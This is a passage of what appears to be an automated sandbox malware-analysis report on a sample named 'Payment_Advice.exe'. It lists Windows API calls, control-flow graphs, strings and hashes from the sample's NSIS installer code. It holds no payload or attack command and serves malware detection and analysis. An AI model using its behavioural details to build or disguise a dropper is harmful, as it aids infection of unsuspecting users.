                                                  APIs
                                                  • DeleteFileW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\,75922EE0,"C:\Users\user\Desktop\Payment_Advice.exe"), ref: 00405799
                                                  • lstrcatW.KERNEL32(004246D8,\*.*), ref: 004057E1
                                                  • lstrcatW.KERNEL32(?,00409014), ref: 00405804
                                                  • lstrlenW.KERNEL32(?,?,00409014,?,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,75922EE0,"C:\Users\user\Desktop\Payment_Advice.exe"), ref: 0040580A
                                                  • FindFirstFileW.KERNELBASE(004246D8,?,?,?,00409014,?,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,75922EE0,"C:\Users\user\Desktop\Payment_Advice.exe"), ref: 0040581A
                                                  • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 004058BA
                                                  • FindClose.KERNEL32(00000000), ref: 004058C9
                                                  Strings
                                                  • \*.*, xrefs: 004057DB
                                                  • "C:\Users\user\Desktop\Payment_Advice.exe", xrefs: 00405779
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 0040577E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd
                                                  Similarity
                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                  • String ID: "C:\Users\user\Desktop\Payment_Advice.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                  • API String ID: 2035342205-3821047887
                                                  • Opcode ID: 75d2b363e8663622168b21bd6825bb858b54638de43af0c3db2919d8f48e60de
                                                  • Instruction ID: ac1757c2d801c66fd25662a47f0a2b95df28272739e9ed83f1af15967125822e
                                                  • Opcode Fuzzy Hash: 75d2b363e8663622168b21bd6825bb858b54638de43af0c3db2919d8f48e60de
                                                  • Instruction Fuzzy Hash: D541B132800A14F6DB217B659C49AAF76B8DF41724F20817BF801B21D1D77C4D92DE6E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a15f429ebeef9cdec0e0a946c982a144c1606cedce27df8dc8c79f03dc168eda
                                                  • Instruction ID: 813cf183cee5dec966489ce4b0e77547af2495df81e7d873cacca3ac907c1fa9
                                                  • Opcode Fuzzy Hash: a15f429ebeef9cdec0e0a946c982a144c1606cedce27df8dc8c79f03dc168eda
                                                  • Instruction Fuzzy Hash: 95F18770D00229CBCF18CFA8C8946ADBBB1FF44305F25856ED856BB281D7785A96CF44
                                                  APIs
                                                  • FindFirstFileW.KERNELBASE(?,00425720,00424ED8,00405A84,00424ED8,00424ED8,00000000,00424ED8,00424ED8,?,?,75922EE0,00405790,?,C:\Users\user\AppData\Local\Temp\,75922EE0), ref: 00406236
                                                  • FindClose.KERNEL32(00000000), ref: 00406242
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd
                                                  Similarity
                                                  • API ID: Find$CloseFileFirst
                                                  • String ID: WB
                                                  • API String ID: 2295610775-2854515933
                                                  • Opcode ID: 97d8ac7551d2396f11c19c7edcb60b5d9a64dc0e7ee5904d5f336116d8bf08e8
                                                  • Instruction ID: 5d149797fe7980082160aacd61be100e78ee611d6da8cc620cf98d5f9d27cd73
                                                  • Opcode Fuzzy Hash: 97d8ac7551d2396f11c19c7edcb60b5d9a64dc0e7ee5904d5f336116d8bf08e8
                                                  • Instruction Fuzzy Hash: 34D01231A590209BC20037387D0C85B7A58AB493307624AB6F826F23E0C7389C6586AD
                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(?,?,00000020,0040339B,00000008), ref: 00406264
                                                  • LoadLibraryA.KERNELBASE(?,?,00000020,0040339B,00000008), ref: 0040626F
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00406280
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd
                                                  Similarity
                                                  • API ID: AddressHandleLibraryLoadModuleProc
                                                  • String ID:
                                                  • API String ID: 310444273-0
                                                  • Opcode ID: fea95c0a25b0bbf4266b289da7fdc3055b6cbcb5f703618f179729d09c13f2c5
                                                  • Instruction ID: 168f21105135a374c063cbb502f6419b25eb399c8ec2d40735489a78174e37d1
                                                  • Opcode Fuzzy Hash: fea95c0a25b0bbf4266b289da7fdc3055b6cbcb5f703618f179729d09c13f2c5
                                                  • Instruction Fuzzy Hash: 6FE0CD36E08120BBC7115B309D44D6773BC9FD9741305043DF505F6240C774AC1297E9

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 167 4038b2-4038ca call 406252 170 4038cc-4038dc call 405e2f 167->170 171 4038de-403915 call 405db5 167->171 180 403938-403961 call 403b88 call 405a3b 170->180 176 403917-403928 call 405db5 171->176 177 40392d-403933 lstrcatW 171->177 176->177 177->180 185 4039f3-4039fb call 405a3b 180->185 186 403967-40396c 180->186 192 403a09-403a2e LoadImageW 185->192 193 4039fd-403a04 call 405f0a 185->193 186->185 188 403972-40399a call 405db5 186->188 188->185 194 40399c-4039a0 188->194 196 403a30-403a60 RegisterClassW 192->196 197 403aaf-403ab7 call 40140b 192->197 193->192 198 4039b2-4039be lstrlenW 194->198 199 4039a2-4039af call 405960 194->199 200 403a66-403aaa SystemParametersInfoW CreateWindowExW 196->200 201 403b7e 196->201 210 403ac1-403acc call 403b88 197->210 211 403ab9-403abc 197->211 205 4039c0-4039ce lstrcmpiW 198->205 206 4039e6-4039ee call 405933 call 405ee8 198->206 199->198 200->197 203 403b80-403b87 201->203 205->206 209 4039d0-4039da GetFileAttributesW 205->209 206->185 213 4039e0-4039e1 call 40597f 209->213 214 4039dc-4039de 209->214 220 403ad2-403aef ShowWindow LoadLibraryW 210->220 221 403b55-403b56 call 405265 210->221 211->203 213->206 214->206 214->213 223 403af1-403af6 LoadLibraryW 220->223 224 403af8-403b0a GetClassInfoW 220->224 227 403b5b-403b5d 221->227 223->224 225 403b22-403b45 DialogBoxParamW call 40140b 224->225 226 403b0c-403b1c GetClassInfoW RegisterClassW 224->226 231 403b4a-403b53 call 403802 225->231 226->225 229 403b77-403b79 call 40140b 227->229 230 403b5f-403b65 227->230 229->201 230->211 232 403b6b-403b72 call 40140b 230->232 231->203 232->211
                                                  APIs
                                                    • Part of subcall function 00406252: GetModuleHandleA.KERNEL32(?,?,00000020,0040339B,00000008), ref: 00406264
                                                    • Part of subcall function 00406252: LoadLibraryA.KERNELBASE(?,?,00000020,0040339B,00000008), ref: 0040626F
                                                    • Part of subcall function 00406252: GetProcAddress.KERNEL32(00000000,?), ref: 00406280
                                                  • lstrcatW.KERNEL32(1033,004226D0), ref: 00403933
                                                  • lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes,1033,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000,00000006,C:\Users\user\AppData\Local\Temp\), ref: 004039B3
                                                  • lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes,1033,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000), ref: 004039C6
                                                  • GetFileAttributesW.KERNEL32(: Completed), ref: 004039D1
                                                  • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes), ref: 00403A1A
                                                    • Part of subcall function 00405E2F: wsprintfW.USER32 ref: 00405E3C
                                                  • RegisterClassW.USER32(00428180), ref: 00403A57
                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A6F
                                                  • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403AA4
                                                  • ShowWindow.USER32(00000005,00000000), ref: 00403ADA
                                                  • LoadLibraryW.KERNELBASE(RichEd20), ref: 00403AEB
                                                  • LoadLibraryW.KERNEL32(RichEd32), ref: 00403AF6
                                                  • GetClassInfoW.USER32(00000000,RichEdit20W,00428180), ref: 00403B06
                                                  • GetClassInfoW.USER32(00000000,RichEdit,00428180), ref: 00403B13
                                                  • RegisterClassW.USER32(00428180), ref: 00403B1C
                                                  • DialogBoxParamW.USER32(?,00000000,00403C55,00000000), ref: 00403B3B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd
                                                  Similarity
                                                  • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                  • String ID: "C:\Users\user\Desktop\Payment_Advice.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                  • API String ID: 914957316-432615598
                                                  • Opcode ID: 944dc6c03719ae45e44b3d46cd84eabff06a9ed2df0d9f5219aeaae38ab8ce66
                                                  • Instruction ID: 7b2c8f7aec5f024c70211f55c02b660a410cf4becd836ab4c66ac285f40ceed6
                                                  • Opcode Fuzzy Hash: 944dc6c03719ae45e44b3d46cd84eabff06a9ed2df0d9f5219aeaae38ab8ce66
                                                  • Instruction Fuzzy Hash: 5A61A470644201BAE320AF669C46F3B3A6CEB44749F40457FF941B62E2DB7C6902CA6D

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 238 403c55-403c67 239 403da8-403db7 238->239 240 403c6d-403c73 238->240 242 403e06-403e1b 239->242 243 403db9-403e01 GetDlgItem * 2 call 40412d SetClassLongW call 40140b 239->243 240->239 241 403c79-403c82 240->241 244 403c84-403c91 SetWindowPos 241->244 245 403c97-403c9a 241->245 247 403e5b-403e60 call 404179 242->247 248 403e1d-403e20 242->248 243->242 244->245 250 403cb4-403cba 245->250 251 403c9c-403cae ShowWindow 245->251 256 403e65-403e80 247->256 253 403e22-403e2d call 401389 248->253 254 403e53-403e55 248->254 257 403cd6-403cd9 250->257 258 403cbc-403cd1 DestroyWindow 250->258 251->250 253->254 269 403e2f-403e4e SendMessageW 253->269 254->247 255 4040fa 254->255 263 4040fc-404103 255->263 261 403e82-403e84 call 40140b 256->261 262 403e89-403e8f 256->262 266 403cdb-403ce7 SetWindowLongW 257->266 267 403cec-403cf2 257->267 264 4040d7-4040dd 258->264 261->262 272 403e95-403ea0 262->272 273 4040b8-4040d1 DestroyWindow EndDialog 262->273 264->255 270 4040df-4040e5 264->270 266->263 274 403d95-403da3 call 404194 267->274 275 403cf8-403d09 GetDlgItem 267->275 269->263 270->255 277 4040e7-4040f0 ShowWindow 270->277 272->273 278 403ea6-403ef3 call 405f0a call 40412d * 3 GetDlgItem 272->278 273->264 274->263 279 403d28-403d2b 275->279 280 403d0b-403d22 SendMessageW IsWindowEnabled 275->280 277->255 308 403ef5-403efa 278->308 309 403efd-403f39 ShowWindow KiUserCallbackDispatcher call 40414f EnableWindow 278->309 281 403d30-403d33 279->281 282 403d2d-403d2e 279->282 280->255 280->279 286 403d41-403d46 281->286 287 403d35-403d3b 281->287 285 403d5e-403d63 call 404106 282->285 285->274 289 403d7c-403d8f SendMessageW 286->289 291 403d48-403d4e 286->291 287->289 290 403d3d-403d3f 287->290 289->274 290->285 294 403d50-403d56 call 40140b 291->294 295 403d65-403d6e call 40140b 291->295 306 403d5c 294->306 295->274 304 403d70-403d7a 295->304 304->306 306->285 308->309 312 403f3b-403f3c 309->312 313 403f3e 309->313 314 403f40-403f6e GetSystemMenu EnableMenuItem SendMessageW 312->314 313->314 315 403f70-403f81 SendMessageW 314->315 316 403f83 314->316 317 403f89-403fc7 call 404162 call 405ee8 lstrlenW call 405f0a SetWindowTextW call 401389 315->317 316->317 317->256 326 403fcd-403fcf 317->326 326->256 327 403fd5-403fd9 326->327 328 403ff8-40400c DestroyWindow 327->328 329 403fdb-403fe1 327->329 328->264 331 404012-40403f CreateDialogParamW 328->331 329->255 330 403fe7-403fed 329->330 330->256 332 403ff3 330->332 331->264 333 404045-40409c call 40412d GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 331->333 332->255 333->255 338 40409e-4040b1 ShowWindow call 404179 333->338 340 4040b6 338->340 340->264
                                                  APIs
                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C91
                                                  • ShowWindow.USER32(?), ref: 00403CAE
                                                  • DestroyWindow.USER32 ref: 00403CC2
                                                  • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CDE
                                                  • GetDlgItem.USER32(?,?), ref: 00403CFF
                                                  • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403D13
                                                  • IsWindowEnabled.USER32(00000000), ref: 00403D1A
                                                  • GetDlgItem.USER32(?,00000001), ref: 00403DC8
                                                  • GetDlgItem.USER32(?,00000002), ref: 00403DD2
                                                  • SetClassLongW.USER32(?,000000F2,?), ref: 00403DEC
                                                  • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403E3D
                                                  • GetDlgItem.USER32(?,00000003), ref: 00403EE3
                                                  • ShowWindow.USER32(00000000,?), ref: 00403F04
                                                  • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403F16
                                                  • EnableWindow.USER32(?,?), ref: 00403F31
                                                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F47
                                                  • EnableMenuItem.USER32(00000000), ref: 00403F4E
                                                  • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403F66
                                                  • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F79
                                                  • lstrlenW.KERNEL32(004226D0,?,004226D0,004281E0), ref: 00403FA2
                                                  • SetWindowTextW.USER32(?,004226D0), ref: 00403FB6
                                                  • ShowWindow.USER32(?,0000000A), ref: 004040EA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd
                                                  Similarity
                                                  • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                  • String ID:
                                                  • API String ID: 3282139019-0
                                                  • Opcode ID: 58ab62fde9f499ba62d07c3a6c70f2588c0a9981729e988da1906f3edcdd1a2b
                                                  • Instruction ID: 4e076ec7db8712f1269b31be3a161a6c229bb752fad246b02f2b6bf34ba01b4a
                                                  • Opcode Fuzzy Hash: 58ab62fde9f499ba62d07c3a6c70f2588c0a9981729e988da1906f3edcdd1a2b
                                                  • Instruction Fuzzy Hash: 5BC1D271A04205BBDB206F61ED49E3B3A69FB89745F40053EF601B11F1CB799852DB2E

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 341 402dba-402e08 GetTickCount GetModuleFileNameW call 405b54 344 402e14-402e42 call 405ee8 call 40597f call 405ee8 GetFileSize 341->344 345 402e0a-402e0f 341->345 353 402f32-402f40 call 402d18 344->353 354 402e48-402e5f 344->354 346 403059-40305d 345->346 361 403011-403016 353->361 362 402f46-402f49 353->362 356 402e61 354->356 357 402e63-402e70 call 4032f7 354->357 356->357 363 402e76-402e7c 357->363 364 402fcd-402fd5 call 402d18 357->364 361->346 365 402f75-402fc1 GlobalAlloc call 40636e call 405b83 CreateFileW 362->365 366 402f4b-402f63 call 40330d call 4032f7 362->366 367 402efc-402f00 363->367 368 402e7e-402e96 call 405b0f 363->368 364->361 392 402fc3-402fc8 365->392 393 402fd7-403007 call 40330d call 403060 365->393 366->361 389 402f69-402f6f 366->389 372 402f02-402f08 call 402d18 367->372 373 402f09-402f0f 367->373 368->373 387 402e98-402e9f 368->387 372->373 379 402f11-402f1f call 406300 373->379 380 402f22-402f2c 373->380 379->380 380->353 380->354 387->373 391 402ea1-402ea8 387->391 389->361 389->365 391->373 394 402eaa-402eb1 391->394 392->346 401 40300c-40300f 393->401 394->373 396 402eb3-402eba 394->396 396->373 398 402ebc-402edc 396->398 398->361 400 402ee2-402ee6 398->400 403 402ee8-402eec 400->403 404 402eee-402ef6 400->404 401->361 402 403018-403029 401->402 405 403031-403036 402->405 406 40302b 402->406 403->353 403->404 404->373 407 402ef8-402efa 404->407 408 403037-40303d 405->408 406->405 407->373 408->408 409 40303f-403057 call 405b0f 408->409 409->346
                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 00402DCE
                                                  • GetModuleFileNameW.KERNEL32(00000000,00437800,00000400), ref: 00402DEA
                                                    • Part of subcall function 00405B54: GetFileAttributesW.KERNELBASE(00000003,00402DFD,00437800,80000000,00000003), ref: 00405B58
                                                    • Part of subcall function 00405B54: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7A
                                                  • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 00402E33
                                                  • GlobalAlloc.KERNELBASE(00000040,00409230), ref: 00402F7A
                                                  Strings
                                                  • Inst, xrefs: 00402EA1
                                                  • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403011
                                                  • Null, xrefs: 00402EB3
                                                  • &, xrefs: 00403002
                                                  • C:\Users\user\Desktop, xrefs: 00402E15, 00402E1A, 00402E20
                                                  • Error launching installer, xrefs: 00402E0A
                                                  • "C:\Users\user\Desktop\Payment_Advice.exe", xrefs: 00402DC3
                                                  • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402FC3
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00402DC7, 00402F92
                                                  • soft, xrefs: 00402EAA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd
                                                  Similarity
                                                  • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                  • String ID: "C:\Users\user\Desktop\Payment_Advice.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$&
                                                  • API String ID: 2803837635-2782480357
                                                  • Opcode ID: 5ecfa0d291b3e3150ad885ea31258d267a33d06369396b94df2ca3b34bcc353b
                                                  • Instruction ID: 1f6ec37bde34587697a274125597031aed9c17e441137146a4e3b0792cc80405
                                                  • Opcode Fuzzy Hash: 5ecfa0d291b3e3150ad885ea31258d267a33d06369396b94df2ca3b34bcc353b
                                                  • Instruction Fuzzy Hash: 3761F431940205ABDB20EF65DD89AAE3BB8AB04355F20417BF600B32D1D7B89E41DB9C

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
